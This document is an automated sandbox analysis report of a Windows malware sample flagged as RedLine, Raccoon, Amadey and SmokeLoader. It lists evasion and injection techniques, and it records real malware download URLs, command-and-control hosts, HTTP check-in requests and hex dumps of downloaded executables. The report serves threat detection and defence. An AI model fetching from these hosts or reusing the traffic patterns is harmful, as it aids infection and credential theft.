Windows Analysis Report 25Kf6vSBoq.exe

Overview

General Information

Sample Name: 25Kf6vSBoq.exe
Analysis ID: 511954
MD5: 3b947ed5aabdd775b1afc31a5c4d39a0
SHA1: 552aa072522f22a003cadd3bcad5e4eb981a5cbb
SHA256: 8245ad87eea6a1f19f658adef8a30b9a512760d866b7075bbf205d7a54296234
Tags: exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Yara detected AntiVM3
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\B82B.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Roaming\ffjbuft ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Roaming\fijbuft ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\irjbuft ReversingLabs: Detection: 45%
Machine Learning detection for sample
Source: 25Kf6vSBoq.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\irjbuft Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\fijbuft Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9C1A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ffjbuft Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D1.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 16.0.irjbuft.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DF9C.exe.400000.15.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 29.0.DF9C.exe.400000.5.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 29.0.DF9C.exe.400000.17.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 16.0.irjbuft.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.6EC5.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DF9C.exe.400000.7.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 29.0.DF9C.exe.400000.11.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 16.0.irjbuft.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.6EC5.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DF9C.exe.400000.13.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 15.0.6EC5.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.0.irjbuft.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.6EC5.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DF9C.exe.400000.9.unpack Avira: Label: TR/AD.Amadey.ezxiu

Exploits:

barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: B82B.exe PID: 1936, type: MEMORYSTR

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49794 version: TLS 1.0
Uses 32bit PE files
Source: 25Kf6vSBoq.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: CD0D.exe, 00000016.00000000.407750577.0000000000417000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: DF9C.exe
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmp
Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: F4BC.exe
Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: 25Kf6vSBoq.exe, 00000001.00000000.243151680.0000000000401000.00000020.00020000.sdmp, 25Kf6vSBoq.exe, 00000002.00000000.254410960.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000D.00000000.348402437.0000000000401000.00000020.00020000.sdmp, irjbuft, 0000000E.00000000.347743203.0000000000401000.00000020.00020000.sdmp, 6EC5.exe, 0000000F.00000000.367434923.0000000000401000.00000020.00020000.sdmp, irjbuft, 00000010.00000000.374293727.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: CD0D.exe, 00000016.00000002.449035922.000000006A8F1000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: CD0D.exe
Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: F4BC.exe, 0000001C.00000000.424216485.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0041B9B2 FindFirstFileExW, 29_2_0041B9B2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49812 -> 91.219.236.97:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49823 -> 185.215.113.45:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228df HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa466 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:29:21 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:29:01 GMTETag: "54000-5cf820050e185"Accept-Ranges: bytesContent-Length: 344064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:30:00 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:29:02 GMTETag: "92800-5cf820058192d"Accept-Ranges: bytesContent-Length: 600064Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 29 52 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 50 ac 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 1b 9f 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 aa 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 30 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a1 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 a5 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 69 74 6f 00 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:30:35 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49794 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rctoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cufneavefi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctxsek.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivcdxqts.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqtrcnnq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhvnsfthad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwdvnqc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rprqyk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjooem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfhoss.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgdpvqs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryqdxjurg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjrxemk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efeydlty.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glvslni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: hajezey1.top
